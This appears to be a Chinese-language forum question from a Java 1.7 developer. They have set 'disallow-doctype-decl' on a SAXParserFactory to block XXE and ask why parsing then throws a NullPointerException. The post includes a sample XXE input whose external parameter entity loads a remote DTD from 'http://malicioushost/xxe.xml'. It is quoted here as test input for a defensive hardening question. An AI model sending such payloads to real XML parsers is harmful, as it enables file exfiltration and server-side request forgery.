1
我已经将SAXParserFactory上的“http://apache.org/xml/features/disallow-doctype-decl”功能设置为true,并且在解析包含外部实体的xml时收到NullPointerException。当阻止doctype功能时获取NullPointerException
代码:
SAXParserFactory spf = SAXParserFactory.newInstance();
spf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
XML:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
<!ENTITY % remote SYSTEM "http://malicioushost/xxe.xml" > %remote; %payload;]>
错误:
Caused by: java.lang.NullPointerException: null
at com.sun.org.apache.xerces.internal.impl.dtd.XMLDTDProcessor.startDTD(XMLDTDProcessor.java:679) ~[na:1.7.0]
at com.sun.org.apache.xerces.internal.impl.XMLDTDScannerImpl.scanDTDInternalSubset(XMLDTDScannerImpl.java:341) ~[na:1.7.0]
at com.sun.org.apache.xerces.internal.impl.XMLDocumentScannerImpl$DTDDriver.dispatch(XMLDocumentScannerImpl.java:1098) ~[na:1.7.0]
at com.sun.org.apache.xerces.internal.impl.XMLDocumentScannerImpl$DTDDriver.next(XMLDocumentScannerImpl.java:1047) ~[na:1.7.0]
有谁知道应该做些什么额外的设置,以避免NPE?
我使用的Java版本:1.7.0_51